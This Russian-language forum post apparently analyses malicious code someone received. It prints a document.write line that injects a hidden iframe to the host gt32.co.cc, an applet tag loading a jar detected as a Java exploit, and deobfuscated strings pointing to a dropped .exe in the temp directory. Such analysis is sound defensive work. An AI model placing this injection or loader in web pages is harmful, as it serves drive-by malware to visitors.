Проанализировав тот код, что вы мне дали в ПМ:
в браузер выкидывается:
document.write('<iframe src="http://gt32.co.cc/index.php?tp=32b260002f490aa3"frameborder="0"></iframe>');
При этом идет скачка файла
gt32.co.cc/games/javaobe.jar, который определяется как
Exploit.Java.176
www.virustotal.com/file-scan/report.html?id=8d240bc87e5de0abd6d5872698dd7bfa06bcfee26055e585fd7844fbf3d589a1-1296664900
анализирем html:
<applet code='prev.monoid.class' archive='./games/javaobe.jar'><param value='Mjjdo##pjuAsVOsVV#wsdMdCRWuL&/W1' name="dskvnds"/>
значению dskvnds передается переменная Mjjdo##pjuAsVOsVV#wsdMdCRWuL&/W1
глянем файлик через Java Decompiler:
chaketik.pastebin.com/PXkj4Q0J
пока достал только пару переменных, я просто первый раз копаюсь в коде java ;)
koli=exe.
ipol=ridpmt.oi.avaj
bsde =eman.so
bsda = .exe
bsdz = java.io.tmpdir
bsdc = os.name
интересно что на хосте открыты порты
5222/tcp open jabber Jabber instant messaging server (Protocol 1.0)
5269/tcp open jabber Jabber instant messaging server (Protocol 1.0)
продолжаю копать)